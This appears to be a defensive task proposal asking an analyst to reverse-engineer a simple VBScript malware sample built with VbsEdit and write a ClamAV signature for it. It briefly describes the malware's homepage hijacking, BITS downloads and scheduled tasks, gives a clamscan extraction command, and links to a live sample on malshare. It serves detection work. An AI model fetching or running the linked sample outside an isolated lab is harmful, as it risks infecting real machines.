Overview
Analyze this generic malware and write a ClamAV signature that detects it
Proposal
This malware does generic malware stuff - changes the homepage, downloades follow-on malware via BITS, schedules tasks to run periodically, etc..
This is from a binary created with VbsEdit, a tool that creates PEs from a given VBScript. We've written a ClamAV bytecode signature that extracts the underlying scripts from these executables, and would like to leverage that to match on the underlying malicious VBS (so, we need a signature on the script contents itself).
Technologies Involved
VBScript
Expected Difficulty
Beginner/Easy - Can be accomplished with basic RE, there is little to no obfuscation involved, there are less than 200 lines of code to analyze, etc.
Overview Analyze this generic malware and write a ClamAV signature that detects it
Proposal This malware does generic malware stuff - changes the homepage, downloades follow-on malware via BITS, schedules tasks to run periodically, etc..
This is from a binary created with VbsEdit, a tool that creates PEs from a given VBScript. We've written a ClamAV bytecode signature that extracts the underlying scripts from these executables, and would like to leverage that to match on the underlying malicious VBS (so, we need a signature on the script contents itself).
Technologies Involved
Expected Difficulty
Technical Info PE containing the VBScript:
57dc49dbc6775376902c4a3244d82fcca96b49dc67d5aa6e54e184de4514165d
Use
clamscan --debug --leave-temps <sample dir> 2>&1 | grep "bytecode: scanning extracted file"to extract.Link to download the sample: https://malshare.com/sample.php?action=detail&hash=4a0fe17bc7e99daaf569de19f1222eed
Note, there is an existing hash-based sig for this sample (Win.Malware.Agent-6401248-0), but we'd like to replace it with a better signature